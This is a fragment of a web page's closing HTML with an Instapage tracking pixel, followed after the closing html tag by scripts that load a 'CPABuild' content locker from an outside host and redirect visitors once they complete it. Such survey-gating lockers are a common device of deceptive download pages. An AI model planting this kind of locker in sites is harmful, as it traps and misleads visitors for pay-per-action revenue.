	<img href="//anthill.instapage.com/projects/56c2f3d796773d0a7e96a536/events/visit?api_key=f1058d5b927a12ddc563dd85bc2a63729bf00fdc344b3786d76f13375d89b5c7251079a9f51b614d5f4c59ba2c388005fbc03c83415082e6e7bce9747a6322437ecffc9b6a102bb823bcb980e250dfefed6e63eff4528b66d83b09e45111f358007612bcc1114576c1668c8e06dc7b892070bb236ac60c50aa0f10ac61596889e3463e4bfa6f09c166373762d3f4c727&data=eyJ1c2VyX2lkIjoxMjc4NDE5LCJwYWdlX2lkIjo0OTA4NDk4LCJwdWJsaXNoZWRfdmVyc2lvbiI6OCwicXVhbnRpdHkiOjEsInN0YXRpY19wYWdlIjpmYWxzZSwidmFyaWF0aW9uX25hbWUiOiJBIiwidmFyaWF0aW9uX2lkIjoxLCJsaW5rZWRfdmFyaWF0aW9uX2lkIjoyLCJpbml0aWFsX3Jlc3BvbnNpdmVfbW9kZSI6bnVsbCwidmlzaXRvcl9pcCI6IjEwNC4xNTUuMTU5LjcxIiwidXNlcmFnZW50IjoiIiwiZ2VuZXJhdGlvbl90aW1lIjo3fQ==" >
</noscript>
<!-- end -->
		
		
		
		
				
				
		
		
			</body>
</html>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":698464,"key":"b8fbd"};
    var forward="";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="//app.dwnlds.co/public/external/locker.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script type="text/javascript">
    $(document).ready(function(){
	//Javascript Here

});
</script>
</body>
</html>
